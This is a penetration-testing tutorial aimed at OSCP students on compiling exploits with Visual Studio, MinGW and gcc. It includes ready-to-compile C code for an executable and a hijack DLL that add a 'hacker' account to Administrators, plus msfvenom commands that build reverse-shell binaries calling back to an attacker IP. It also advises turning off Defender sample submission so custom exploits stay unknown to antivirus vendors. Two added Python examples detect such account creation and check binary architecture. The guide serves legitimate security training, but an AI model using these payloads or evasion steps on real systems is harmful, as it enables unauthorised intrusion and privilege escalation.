
# Compiling Exploits

## Introduction

***

While compiling your own exploits could sound daunting, it is actually not as difficult as you may imagine. In fact, it is often easier than searching for hours for a pre-compiled binary that works.

Learning how to compile your own exploits has several advantages:

* **Availability**: Sometimes a pre-compiled binary just doesn't exist for the specific tool / exploit you need.
* **Reliability**: You can ensure the exploit targets the correct architecture (x64 vs x86) so it works on the target machine.
* **Safety**: You can verify the source code yourself, avoiding potentially malicious binaries (beginner hackers are prime targets!).

This guide will walk you through the simple steps to compile code for both Windows and Linux, as well as sharing some repositories of precompiled binaries for your convenience.

## Setting Up Our Environment

***

For OSCP (and beyond), we should ideally have a **Windows 10/11 Development Machine / VM** (separate from your Kali machine) to create and compile our Windows-specific exploits and binaries.

* It is possible to compile some Windows exploits on Kali Linux, but you are more likely to run into dependency issues.
* Note that you may have to turn off Windows Defender, or set up exclusion paths for the project folders to avoid Defender quarantining the compiled binaries.

<Steps>
  <Step title="Windows Defender Settings">
    It is best that we keep **Real-time protection** enabled (to protect our system), but **Automatic sample submission** disabled (to avoid our custom exploits being submitted to AV vendors).

    <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/win_defender_1.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=be2f89a3600f3308aa238b044735439b" alt="Screenshot of Windows Defender exclusion paths" width="1256" height="1072" data-path="assets/images/oscp/win_defender_1.png" />
  </Step>

  <Step title="Finding Exclusion Settings">
    We can find the Exclusion settings by going to ***Windows Security*** > ***Virus & threat protection*** > ***Exclusions*** (Scroll to the bottom).

    <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/win_defender_2.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=d386cdb97ac669f05d9260cdb9a08b64" alt="Screenshot of Windows Defender exclusion settings" width="1256" height="978" data-path="assets/images/oscp/win_defender_2.png" />
  </Step>

  <Step title="Setting Exclusion Paths">
    And we can set exclusion paths for the project folders here:

    <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/win_defender_3.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=2d955048412eb43eaca84b09398c42cf" alt="Screenshot of Windows Defender exclusion details" width="1072" height="594" data-path="assets/images/oscp/win_defender_3.png" />
  </Step>
</Steps>

### Installing Visual Studio

Visual Studio is to be installed on our Windows Development Machine. We just need the **Visual Studio Community** version, which is free and enough for our usage.

<Steps>
  <Step title="Installing Visual Studio">
    Go to the [Visual Studio download page](https://visualstudio.microsoft.com/downloads/) and click on "***Free Download***" on the Community tab.

    * Note: Make sure you download ***Visual Studio***, NOT Visual Studio Code.

          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/download_vs.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=d8f5145aec4fdd0801c6637bbce198d1" alt="Screenshot of Visual Studio download page" width="1388" height="946" data-path="assets/images/oscp/download_vs.png" />
  </Step>

  <Step title="Choosing Workloads">
    During installation, you will be asked which "***Workloads***" to install. We generally only need these two:

    * `Desktop development with C++` (For kernel exploits, DLLs)
    * `.NET desktop development` (For C# tools like Rubeus/SharpUp)

          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/vs_workloads.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=6a5033377a6ef78b93b021713b056633" alt="Screenshot of Choosing Workloads" width="1552" height="1119" data-path="assets/images/oscp/vs_workloads.png" />
  </Step>

  <Step title="Finishing Installation">
    Let it download and install the required packages; this might take a while.

    * Once finished, click on ***Launch***, and choose "***Skip and add accounts later***".
    * We can then open existing `.sln` project files, or create a new project.
  </Step>
</Steps>

### Downloading the Code

We have to get the exploit code onto our compiling machine.

##### On Kali Linux:

This will clone the repository into our current directory:

```bash wrap theme={null}
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus
```

##### On Windows:

If you have Git installed on Windows:

```powershell wrap theme={null}
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus
```

##### Without using Git:

We can also just click the green "***Code***" button on GitHub and select "***Download ZIP***", then extract it.

<img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/download_repo.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=579bebd3237735b0601cab4b36c49137" alt="Screenshot of Downloading ZIP" width="1181" height="962" data-path="assets/images/oscp/download_repo.png" />

## Compiling Windows Exploits

***

Windows exploits typically come in two flavors: C# / .NET (e.g., [Rubeus](https://github.com/GhostPack/Rubeus), [Seatbelt](https://github.com/GhostPack/Seatbelt), [SharpUp](https://github.com/GhostPack/SharpUp), etc.), and Native C/C++ (e.g., [PrintSpoofer](https://github.com/itm4n/PrintSpoofer), [WerTrigger](https://github.com/sailay1996/WerTrigger), etc.).

### Visual Studio (C# / .NET)

Common Examples of C# based exploits: Rubeus, SharpUp, Seatbelt, and most Potato exploits.

<Steps>
  <Step title="Open the Project">
    Double-click the `.sln` (Solution) file to open the project file with Visual Studio.

    <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/sln.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=c71ce46736e37a05ad171f1784b24cb0" alt="Screenshot of Opening the Project file" width="999" height="687" data-path="assets/images/oscp/sln.png" />
  </Step>

  <Step title="Check .NET Version">
    You must compile for a version of .NET that is installed on the victim (e.g., Windows 7/2008 usually has .NET 3.5; Windows 10/2016+ has .NET 4.x).

    * Many well-known .NET tools were built on older framework versions. If your target is running modern Windows 10 / 11 systems (which is very likely for OSCP), you can update to `.NET Framework 4.7.2` or higher.
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/update_dotnet_framework.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=2e29a22f7dbee0ca60fb08d9e435c5b4" alt="Screenshot of updating the Target Framework" width="718" height="415" data-path="assets/images/oscp/update_dotnet_framework.png" />

    - To change the Target Framework later, click on ***Project*** > ***Properties***.
    - Go to the ***Application*** tab.
    - Change (and Install if needed) the ***Target Framework*** to the version you need (e.g., `.NET Framework 4.5`).
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/change_dotnet_framework.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=b90dddb04efb3ac54e06ba60d7f8f071" alt="Screenshot of the Target Framework dropdown" width="1242" height="956" data-path="assets/images/oscp/change_dotnet_framework.png" />
  </Step>

  <Step title="Restore NuGet Packages (if needed)">
    Some C# tools use "NuGet" to manage dependencies (like external libraries). If you see yellow warning triangles in the Solution Explorer, right-click the ***Solution*** > ***Restore NuGet Packages***.
  </Step>

  <Step title="Build">
    * Set configuration to ***Release*** and ***Any CPU*** (or x64/x86 specific if needed).
    * Go to ***Build*** > ***Build Solution***, or click on the "***Start***" button in the toolbar.
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/release.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=922967696e4b1510fd4359d49d221426" alt="Screenshot of Building the Solution" width="794" height="253" data-path="assets/images/oscp/release.png" />

    - Upon successful compilation, the executable will be in the `<project_name>\bin\Release` folder. If you built with the ***Start*** button, it will also run automatically.
      * Or in the `<project_name>\bin\x64\Release` folder if you selected x64.
            <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/cs_compile.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=d7e23a14c9eacb7a5e53a6bce7698e02" alt="Screenshot of Compiled Executable" width="1679" height="1160" data-path="assets/images/oscp/cs_compile.png" />
  </Step>
</Steps>

<br />

### Visual Studio (C/C++)

Visual Studio handles dependencies and project structures automatically for C/C++ projects.

<Steps>
  <Step title="Open the Project">
    Double-click the `.sln` (Solution) file to open the project file with Visual Studio.
  </Step>

  <Step title="Retarget Solution">
    If the project is old, you might see errors about missing SDKs.

    * Click on ***Retarget All***, and ***Apply*** to retarget to the latest Windows SDK you have installed.
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/retarget_solution.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=d0ad9ffb3719053d8393fdc6fb8682b9" alt="Screenshot of right-clicking Solution and selecting Retarget Solution" width="1708" height="1074" data-path="assets/images/oscp/retarget_solution.png" />
    * If you have ignored it previously, you can right-click the ***Solution*** in the "Solution Explorer" pane and select ***Retarget Solution***.
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/retarget_solution_later.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=bd4d86d339316cb88ddac3558b828df5" alt="Screenshot of right-clicking Solution and selecting Retarget Solution later" width="993" height="539" data-path="assets/images/oscp/retarget_solution_later.png" />
  </Step>

  <Step title="Select Architecture">
    Look at the toolbar at the top.

    * Set the configuration to ***Release***.
    * Set the CPU to ***x64*** (for 64-bit targets) or ***x86*** (for 32-bit targets). This **must** match your victim machine.
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/c_compile.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=9d49aa1f0600f8dd8049d5032ccfb9f5" alt="Screenshot of the toolbar with Release and x64 selected" width="993" height="207" data-path="assets/images/oscp/c_compile.png" />
  </Step>

  <Step title="Build">
    Press `Ctrl + Shift + B` or go to ***Build*** > ***Build Solution***.
    Check the Output window at the bottom to find where your `.exe` was saved.

    * It will be in the `<project_name>\x64\Release` folder.
          <img src="https://mintcdn.com/hackwithmike/ETI1ZE6iaiEVZX3U/assets/images/oscp/c_compile2.png?fit=max&auto=format&n=ETI1ZE6iaiEVZX3U&q=85&s=dd4d0dcd5204aa4a0dcb76eb90ed4c97" alt="Screenshot of Build Output" width="1061" height="784" data-path="assets/images/oscp/c_compile2.png" />
  </Step>
</Steps>

### Cross-Compiling with MinGW on Linux

For simple C / C++ exploits, you can compile directly on Kali.

* Note that the `-lws2_32` flag is required to link the Windows Sockets (Winsock) library for exploits that use network connections.
* The `-static` flag is commonly used to avoid linking issues with dynamic libraries. This makes the executable larger but more portable.

<Steps>
  <Step title="Install MinGW">
    To compile Windows executables on Kali using gcc, first install MinGW:

    ```bash wrap theme={null}
    sudo apt update && sudo apt install mingw-w64
    ```
  </Step>

  <Step title="Compile Your Exploit">
    We can then compile our exploit based on the target architecture.

    For C exploits, we use `gcc`:

    ```bash wrap theme={null}
    # Compile for 64-bit
    x86_64-w64-mingw32-gcc exploit.c -o exploit.exe -static

    # Compile for 32-bit
    i686-w64-mingw32-gcc exploit.c -o exploit.exe -static
    ```

    Whereas for C++ exploits, we use `g++`:

    ```bash wrap theme={null}
    # Compile for 64-bit
    x86_64-w64-mingw32-g++ exploit.cpp -o exploit.exe -static

    # Compile for 32-bit
    i686-w64-mingw32-g++ exploit.cpp -o exploit.exe -static
    ```
  </Step>
</Steps>

<br />

### Writing & Compiling Custom Exploits

***

In OSCP, you often need to create a simple "malicious" file to replace a legitimate binary (Service / Cronjob Replacement) or hijack a library (DLL Hijacking).

##### Simple EXE (Executable Replacement)

If we can replace a service binary or a scheduled task binary, we can compile the following executable to add a user. The system commands can be replaced with any other CMD commands you need.

**`adduser.c`**

```c wrap theme={null}
// For x64 compile with: x86_64-w64-mingw32-gcc adduser.c -o adduser64.exe
// For x86 compile with: i686-w64-mingw32-gcc adduser.c -o adduser86.exe
#include <stdlib.h>

int main() {
    system("net user hacker Password123! /add");
    system("net localgroup administrators hacker /add");
    return 0;
}
```

##### Simple DLL (DLL Hijacking)

If you need to hijack a DLL, the replacement DLL needs a specific structure: a `DllMain` entry point.

* Note that we will need the `-shared` flag for compiling DLLs.

`adduser_dll.c` for malicious DLL:

```c wrap theme={null}
// For x64 compile with: x86_64-w64-mingw32-gcc adduser_dll.c -shared -o adduser64.dll
// For x86 compile with: i686-w64-mingw32-gcc adduser_dll.c -shared -o adduser86.dll

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        system("cmd.exe /c net user hacker Password123! /add");
        system("cmd.exe /c net localgroup administrators hacker /add");
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```
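Both payloads above create a local account and immediately add it to the Administrators group, which the Windows Security log records as event 4720 followed by event 4732. The following added example (not code from the original page) correlates the two over constructed, simplified records; the record layout, `SAMPLE_EVENTS` and `find_new_admins` are assumptions of this example.

```python
from datetime import datetime, timedelta

ADMINS_SID = "S-1-5-32-544"  # well-known SID of the built-in Administrators group
SYSTEM_SID = "S-1-5-18"      # LocalSystem, the account many services run as

# Constructed, simplified Security-log records. Field names follow the EventData
# of events 4720 (account created) and 4732 (member added to a local group);
# every value is made up for this example.
SAMPLE_EVENTS = [
    {"id": 4720, "time": "2024-05-01T10:15:02", "SubjectUserSid": SYSTEM_SID,
     "TargetUserName": "hacker", "TargetSid": "S-1-5-21-1-2-3-1005"},
    {"id": 4732, "time": "2024-05-01T10:15:03", "SubjectUserSid": SYSTEM_SID,
     "TargetSid": ADMINS_SID, "MemberSid": "S-1-5-21-1-2-3-1005"},
    # Ordinary provisioning: created by an admin, promoted two days later.
    {"id": 4720, "time": "2024-05-01T11:00:00", "SubjectUserSid": "S-1-5-21-1-2-3-500",
     "TargetUserName": "intern", "TargetSid": "S-1-5-21-1-2-3-1006"},
    {"id": 4732, "time": "2024-05-03T09:00:00", "SubjectUserSid": "S-1-5-21-1-2-3-500",
     "TargetSid": ADMINS_SID, "MemberSid": "S-1-5-21-1-2-3-1006"},
]


def find_new_admins(events, window=timedelta(seconds=60)):
    """Accounts created and added to Administrators within `window` of each other."""
    created = {}  # new account SID -> (creation time, account name, creator SID)
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["TargetSid"]] = (ts, ev["TargetUserName"], ev["SubjectUserSid"])
        elif ev["id"] == 4732 and ev["TargetSid"] == ADMINS_SID:
            # 4732 carries the member's SID, so join on the SID from 4720.
            hit = created.get(ev["MemberSid"])
            if hit and ts - hit[0] <= window:
                findings.append({
                    "account": hit[1],
                    "sid": ev["MemberSid"],
                    "seconds_to_admin": (ts - hit[0]).total_seconds(),
                    "created_by_system": hit[2] == SYSTEM_SID,
                })
    return findings


if __name__ == "__main__":
    for finding in find_new_admins(SAMPLE_EVENTS):
        print(finding)
```

These events are only written when account-management auditing is enabled on the host.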

<br />

## Compiling Linux Exploits

***

While there could be compatibility issues, we usually compile Linux exploits on our own Linux machine and transfer the compiled binary to the victim in the OSCP context. This is easier and doesn't rely on the victim having development tools (like `gcc`) installed.

### Compiling Locally (On Kali)

We typically use `gcc` (for C) or `g++` (for C++) on Kali to build binaries for our Linux targets. Just make sure we match the architecture (32-bit vs 64-bit) of the target.

<Steps>
  <Step title="Check Victim Architecture">
    On the victim, run `uname -a`.

    * `x86_64` = 64-bit
    * `i686` or `i386` = 32-bit
  </Step>

  <Step title="Compile on Kali">
    **For 64-bit Targets:**
    Most exploits compile with a standard command. We can use the `-static` flag to ensure libraries (like libc) are bundled in, so it works even if the victim has different library versions, but note that this will significantly increase the file size.

    * We may also need the **`-pthread`** flag to link the POSIX thread library for threaded exploits (like DirtyCow variants).

    ```bash wrap theme={null}
    gcc exploit.c -o exploit -static
    ```

    **For 32-bit Targets:**
    If your Kali is 64-bit (which it likely is), you need to force a 32-bit build.

    ```bash wrap theme={null}
    # You might need to install 32-bit libraries first:
    # sudo apt install gcc-multilib

    gcc -m32 exploit.c -o exploit -static
    ```
  </Step>

  <Step title="Transfer">
    Upload the binary to the victim (e.g., using `wget` or `curl`).
  </Step>
</Steps>
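The "Select Architecture" step for Windows builds and the `uname -a` check above both come down to one field in the header of the file you produced. The following added example (not code from the original page) reads that field from PE and ELF files so a build can be checked before it is transferred; `binary_arch`, `matches_uname` and the two `sample_*` builders are names chosen for this example, and the sample headers are constructed.

```python
import struct
import sys

PE_MACHINES = {0x014C: "x86", 0x8664: "x64"}  # IMAGE_FILE_MACHINE_I386 / _AMD64
ELF_MACHINES = {3: "x86", 62: "x64"}          # EM_386 / EM_X86_64
UNAME_MACHINES = {"x86_64": "x64", "i686": "x86", "i386": "x86"}


def binary_arch(data: bytes) -> str:
    """Return e.g. 'PE x64' or 'ELF x86' from a file's header bytes."""
    if data[:2] == b"MZ":
        if len(data) < 0x40:
            raise ValueError("truncated DOS header")
        (pe_off,) = struct.unpack_from("<I", data, 0x3C)  # e_lfanew
        if data[pe_off:pe_off + 4] != b"PE\0\0" or len(data) < pe_off + 6:
            raise ValueError("missing PE signature")
        (machine,) = struct.unpack_from("<H", data, pe_off + 4)
        return "PE " + PE_MACHINES.get(machine, f"unknown(0x{machine:04x})")
    if data[:4] == b"\x7fELF":
        if len(data) < 20:
            raise ValueError("truncated ELF header")
        endian = "<" if data[5] == 1 else ">"  # EI_DATA: 1 = little-endian
        (machine,) = struct.unpack_from(endian + "H", data, 18)  # e_machine
        return "ELF " + ELF_MACHINES.get(machine, f"unknown({machine})")
    raise ValueError("not a PE or ELF file")


def matches_uname(data: bytes, uname_machine: str) -> bool:
    """True if an ELF build matches the machine string reported on the target."""
    return binary_arch(data) == "ELF " + UNAME_MACHINES[uname_machine]


def sample_pe(machine: int) -> bytes:
    """Constructed header bytes only (not a runnable executable)."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    return dos + b"PE\0\0" + struct.pack("<H", machine)


def sample_elf(ei_class: int, machine: int) -> bytes:
    """Constructed 20-byte ELF header prefix: e_ident, e_type, e_machine."""
    ident = b"\x7fELF" + bytes([ei_class, 1, 1]) + b"\0" * 9
    return ident + struct.pack("<HH", 2, machine)


if __name__ == "__main__":
    # Usage: python3 check_arch.py exploit.exe exploit
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, "->", binary_arch(fh.read(4096)))
```

A .NET assembly built as ***Any CPU*** carries the x86 machine value in this field, so the check is meaningful for native builds and for .NET builds with an explicit platform.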

### Compiling on the Victim

Sometimes, a kernel exploit is very sensitive to the specific kernel headers of the machine. If your cross-compiled binary fails with an error such as `Segmentation fault`, try compiling it directly on the victim if `gcc` is available.

<Steps>
  <Step title="Upload Exploit Source Code to Victim">
    Upload the `.c` source code to a user writable directory like `/tmp`.
  </Step>

  <Step title="Run the compile command locally">
    ```bash wrap theme={null}
    gcc exploit.c -o exploit
    ```
  </Step>
</Steps>

<br />

## Quick Wins: Msfvenom

***

Sometimes you just need a quick reverse shell or a binary that runs a specific command. We can use `msfvenom` to generate these instantly.

* These do not count as Metasploit usage, as long as we are not using Meterpreter payloads.

##### Standard Windows Reverse Shell EXE:

```bash wrap theme={null}
msfvenom -p windows/x64/shell_reverse_tcp LHOST='<Attacker_IP>' LPORT=443 -f exe -o shell.exe
```

##### Standard Windows Reverse Shell DLL:

```bash wrap theme={null}
msfvenom -p windows/x64/shell_reverse_tcp LHOST='<Attacker_IP>' LPORT=443 -f dll -o shell.dll
```

##### Standard Linux Reverse Shell ELF Binary:

```bash wrap theme={null}
msfvenom -p linux/x64/shell_reverse_tcp LHOST='<Attacker_IP>' LPORT=443 -f elf -o shell.elf
```

##### Run a Command on the Victim:

Once run, this will execute the command in a new shell instance.

* `/c` runs the command and then closes the shell, while `/k` keeps the shell open.

```bash wrap theme={null}
msfvenom -p windows/x64/exec CMD='cmd.exe /c whoami' -f exe -o test_command.exe
```

Technically you can do the same on Linux, but it's less useful since you can just run commands directly.

```bash wrap theme={null}
msfvenom -p linux/x64/exec CMD='whoami' -f elf -o test_command
```

<br />

## Precompiled Binaries

***

Here are some repositories for precompiled binaries. **Always exercise caution** - running any binaries from an untrusted source is a security risk. Ethical hackers are prime targets for actual malicious actors, since we are more likely to have reduced security measures when we are working with exploits.

* Note that I have not verified the authenticity of the binaries in these repositories, and I cannot guarantee their safety. Use at your own risk.

### Community Repositories

* **[jakobfriedl / precompiled-binaries](https://github.com/jakobfriedl/precompiled-binaries)**: A collection of useful pre-compiled .NET binaries or other executables for penetration testing Windows Active Directory environments.

### Outdated / Archived Repositories

* **[SecWiki / windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)**: A collection of precompiled Windows kernel exploits - most of them are for older kernels, and are likely irrelevant for OSCP.
* **[SecWiki / linux-kernel-exploits](https://github.com/SecWiki/linux-kernel-exploits)**: A collection of precompiled Linux kernel exploits - most of them are for older kernels, and are likely irrelevant for OSCP.

### My Repository

* To be added.
